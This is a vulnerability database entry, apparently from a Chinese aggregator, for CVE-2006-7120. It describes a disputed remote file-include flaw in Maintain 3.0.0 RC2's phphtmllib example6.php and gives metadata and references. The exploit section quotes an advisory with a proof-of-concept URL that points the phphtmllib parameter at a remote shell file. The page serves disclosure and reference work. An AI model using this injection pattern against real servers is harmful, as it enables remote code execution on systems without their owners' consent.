Maintain Example6.PHP 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111295 漏洞类型 输入验证
发布时间 2006-10-16 更新时间 2007-03-07
CVE编号 CVE-2006-7120 CNNVD-ID CNNVD-200703-166
漏洞平台 PHP CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/28821
https://cxsecurity.com/issue/WLB-2007030057
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-166
|漏洞详情
**有争议的**maintain3.0.0-RC2的lib/php/phphtmllib-2.5.4/examples/example6.php中存在PHP远程文件包含漏洞。远程攻击者可以借助phphtmllib参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/20560/info

Maintain is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

Maintain version 3.0.0 RC2 is affected.

http://www.example.com/[path]/lib/php/phphtmllib-2.5.4/examples/example6.php?phphtmllib=[shell]
|参考资料

来源:XF
名称:maintain-phphtmllib-file-include(29596)
链接:http://xforce.iss.net/xforce/xfdb/29596
来源:BID
名称:20560
链接:http://www.securityfocus.com/bid/20560
来源:BUGTRAQ
名称:20061015maintain-3.0.0-RC2-RemoteFileIncludeVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/448780/100/0/threaded
来源:SREASON
名称:2359
链接:http://securityreason.com/securityalert/2359